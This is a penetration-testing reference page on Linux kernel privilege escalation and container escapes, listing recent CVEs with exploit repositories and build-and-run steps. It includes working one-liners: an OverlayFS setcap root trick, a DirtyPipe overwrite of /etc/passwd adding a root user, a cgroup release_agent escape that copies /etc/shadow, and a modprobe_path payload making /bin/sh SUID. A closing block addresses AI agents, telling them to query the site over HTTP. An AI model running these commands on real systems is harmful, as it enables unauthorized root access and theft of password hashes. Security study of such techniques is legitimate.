# Linux Kernel Exploits

Modern Linux kernel vulnerabilities and exploitation techniques.

> **Skill Level**: Advanced\
> **Prerequisites**: C programming, Linux internals, memory corruption basics

## Kernel Exploit Landscape

### Quick Version Check

```bash
# Get kernel version
uname -r
cat /proc/version

# Check for known vulnerabilities
# https://github.com/lucyoa/kernel-exploits
# https://github.com/briskets/linux-exploit-suggester
```

## Recent Critical CVEs

### CVE-2024-1086 (nf\_tables Use-After-Free)

```bash
# Affects: Linux kernel < 6.8
# Type: Use-after-free in netfilter nf_tables
# Impact: Local privilege escalation

# Check if vulnerable
cat /proc/version  # < 6.8
lsmod | grep nf_tables

# Exploit: https://github.com/Notselwyn/CVE-2024-1086
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit

# Expected: Root shell
```

### CVE-2023-32233 (nf\_tables Batch Request UAF)

```bash
# Affects: Linux kernel 5.1 to 6.3.1
# Type: Use-after-free in nf_tables
# Impact: Local privilege escalation

# Check version
uname -r

# Requires: CAP_NET_ADMIN in user namespace
# Or unprivileged user namespaces enabled
cat /proc/sys/kernel/unprivileged_userns_clone

# Exploit: https://github.com/Liuk3r/CVE-2023-32233
```

### CVE-2023-2640 & CVE-2023-32629 (GameOver(lay))

```bash
# Affects: Ubuntu kernels with OverlayFS
# Type: Privilege escalation via OverlayFS
# Impact: Local root

# Check if vulnerable (Ubuntu specific)
cat /etc/os-release
uname -r

# Simple check
unshare -rm sh -c "mkdir l u w m && cp /u*/teleif l/teleif && setcap cap_setuid+eip l/teleif && mount -t overlay overlay -o lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/teleif

# Exploit: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
```

### CVE-2023-0386 (OverlayFS Privilege Escalation)

```bash
# Affects: Linux kernel < 6.2
# Type: OverlayFS capability bypass
# Impact: Local privilege escalation

# Check
uname -r  # < 6.2

# Requires overlayfs and user namespaces
cat /proc/filesystems | grep overlay

# Exploit: https://github.com/sxlmnwb/CVE-2023-0386
```

### CVE-2022-0847 (DirtyPipe)

```bash
# Affects: Linux kernel 5.8 to 5.16.11, 5.15.25, 5.10.102
# Type: Pipe buffer flag overwrite
# Impact: Arbitrary file write, privilege escalation

# Check version
uname -r

# Compile exploit
# https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
gcc -o exploit exploit.c
./exploit /etc/passwd 1 $'toor:$1$salt$hash:0:0:root:/root:/bin/bash\n'

# Then: su toor
```

### CVE-2022-2588 (route4 UAF)

```bash
# Affects: Linux kernel < 5.19
# Type: Use-after-free in route4 classifier
# Impact: Local privilege escalation

# Requires: CONFIG_NET_CLS_ROUTE4=y
cat /boot/config-$(uname -r) | grep CONFIG_NET_CLS_ROUTE4

# Exploit: https://github.com/Markakd/CVE-2022-2588
```

## io\_uring Vulnerabilities

### Overview

```
io_uring is async I/O interface (kernel 5.1+)
Complex attack surface - many vulnerabilities discovered
Often requires: kernel 5.1+, io_uring enabled
```

### CVE-2024-0582 (io\_uring PBUF UAF)

```bash
# Affects: Linux 6.4 to 6.7
# Type: Use-after-free in provided buffers

# Check io_uring availability
cat /proc/filesystems | grep io_uring
ls /dev/io_uring* 2>/dev/null
```

### CVE-2023-2598 (io\_uring UAF)

```bash
# Affects: Linux kernel 5.7 to 6.3
# Type: Use-after-free

# Exploit approach varies by kernel version
# Check specific PoCs for your kernel
```

### Disable io\_uring (Mitigation)

```bash
# Check if disabled
sysctl kernel.io_uring_disabled

# Disable (requires root)
sysctl -w kernel.io_uring_disabled=2

# Or in /etc/sysctl.conf
kernel.io_uring_disabled = 2
```

## eBPF Exploits

### Attack Surface

```
eBPF (extended Berkeley Packet Filter):
- Runs in kernel context
- Verifier supposed to ensure safety
- Verifier bugs = kernel code execution
```

### CVE-2023-2163 (eBPF Verifier Bypass)

```bash
# Affects: Various kernel versions
# Type: Verifier bounds tracking error
# Impact: Arbitrary kernel read/write

# Check eBPF availability
ls /sys/fs/bpf/
bpftool prog list 2>/dev/null

# Unprivileged BPF (if enabled)
cat /proc/sys/kernel/unprivileged_bpf_disabled
# 0 = unprivileged users can use BPF
```

### Mitigation

```bash
# Disable unprivileged BPF
sysctl -w kernel.unprivileged_bpf_disabled=1

# Lockdown BPF
echo 2 > /proc/sys/kernel/unprivileged_bpf_disabled
```

## Container Escape Exploits

### CVE-2024-21626 (runc Container Escape)

```bash
# Affects: runc < 1.1.12
# Type: File descriptor leak
# Impact: Container escape

# Check runc version
runc --version
docker info | grep -i runc

# Exploit involves:
# 1. Leaking /proc/self/fd/X from runc
# 2. Using leaked fd to access host filesystem
```

### CVE-2022-0492 (cgroup Escape)

```bash
# Affects: Linux kernel < 5.17
# Type: cgroup v1 release_agent escape
# Impact: Container escape (if cgroup mounted)

# Inside container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/exploit.sh" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit.sh
echo "cat /etc/shadow > $host_path/shadow" >> /exploit.sh
chmod +x /exploit.sh
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```

## Exploitation Techniques

### Heap Exploitation

```c
// Modern kernel heap (SLUB) exploitation

// 1. Spray technique
// Allocate many objects to control heap layout
for (int i = 0; i < 1000; i++) {
    spray_objects[i] = allocate_kernel_object();
}

// 2. Cross-cache attack
// Exhaust slab, force allocation from different cache
// Allows type confusion between objects

// 3. msg_msg spray
// Use msgsnd() to spray controlled data
struct msgbuf {
    long mtype;
    char mtext[SIZE];
};
msgsnd(qid, &msg, SIZE, 0);
```

### ROP in Kernel

```c
// Kernel ROP gadgets
// Find with: ROPgadget --binary vmlinux

// Typical chain:
// 1. Disable SMEP/SMAP (if possible)
// 2. Call commit_creds(prepare_kernel_cred(0))
// 3. Return to userspace

// prepare_kernel_cred and commit_creds addresses
// /proc/kallsyms (if kptr_restrict=0)
cat /proc/kallsyms | grep -E "prepare_kernel_cred|commit_creds"
```

### ret2usr (If No SMEP/SMAP)

```c
// Direct jump to userspace code from kernel
// Blocked by SMEP (code) and SMAP (data)

// Check protections
cat /proc/cpuinfo | grep -E "smep|smap"

// If neither present:
void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite function pointer to point to escalate()
```

### Modprobe Path Overwrite

```c
// Overwrite modprobe_path to execute arbitrary binary
// When unknown binary format executed, kernel runs modprobe

// 1. Find modprobe_path address
cat /proc/kallsyms | grep modprobe_path

// 2. Overwrite with path to your script
// modprobe_path = "/tmp/pwn"

// 3. Create /tmp/pwn script
echo '#!/bin/sh' > /tmp/pwn
echo 'chmod 4755 /bin/sh' >> /tmp/pwn
chmod +x /tmp/pwn

// 4. Trigger by executing invalid binary
echo -e '\xff\xff\xff\xff' > /tmp/invalid
chmod +x /tmp/invalid
/tmp/invalid

// 5. Now /bin/sh is SUID root
/bin/sh -p
```

## Kernel Protection Bypass

### KASLR Bypass

```bash
# Kernel Address Space Layout Randomization
# Leaks needed to find kernel addresses

# Common leak sources:
# - /proc/kallsyms (if kptr_restrict=0)
# - dmesg (if dmesg_restrict=0)
# - Kernel info leaks via side channels
# - eBPF verifier leaks

# Check restrictions
cat /proc/sys/kernel/kptr_restrict
cat /proc/sys/kernel/dmesg_restrict
```

### SMEP/SMAP Bypass

```c
// SMEP: Can't execute userspace code from kernel
// SMAP: Can't access userspace data from kernel

// Bypass via ROP:
// 1. Flip CR4 bits to disable SMEP/SMAP
// native_write_cr4 gadget

// Or use kernel-only ROP chain
// Stay entirely in kernel space
```

## Tools

```bash
# Linux Exploit Suggester
https://github.com/mzet-/linux-exploit-suggester
./linux-exploit-suggester.sh

# Linux Exploit Suggester 2
https://github.com/jondonas/linux-exploit-suggester-2
perl linux-exploit-suggester-2.pl

# PEDA/GEF/pwndbg for kernel debugging
# https://github.com/pwndbg/pwndbg

# Kernel exploit development
https://github.com/xairy/kernel-exploits
```

## Quick Reference

| CVE            | Kernel Versions | Type           |
| -------------- | --------------- | -------------- |
| CVE-2024-1086  | < 6.8           | nf\_tables UAF |
| CVE-2023-32233 | 5.1-6.3.1       | nf\_tables UAF |
| CVE-2023-2640  | Ubuntu specific | OverlayFS      |
| CVE-2023-0386  | < 6.2           | OverlayFS      |
| CVE-2022-0847  | 5.8-5.16.11     | DirtyPipe      |
| CVE-2022-2588  | < 5.19          | route4 UAF     |

## Related Topics

* [Linux Post-Exploitation](https://github.com/six2dez/pentest-book/blob/master/linux.md) - Linux privesc
* [Privilege Escalation](/exploitation/privilege-escalation.md) - Overview
* [Docker & Kubernetes](/enumeration/cloud/docker-and-and-kubernetes.md) - Container escapes


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/exploitation/linux-kernel-2024.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.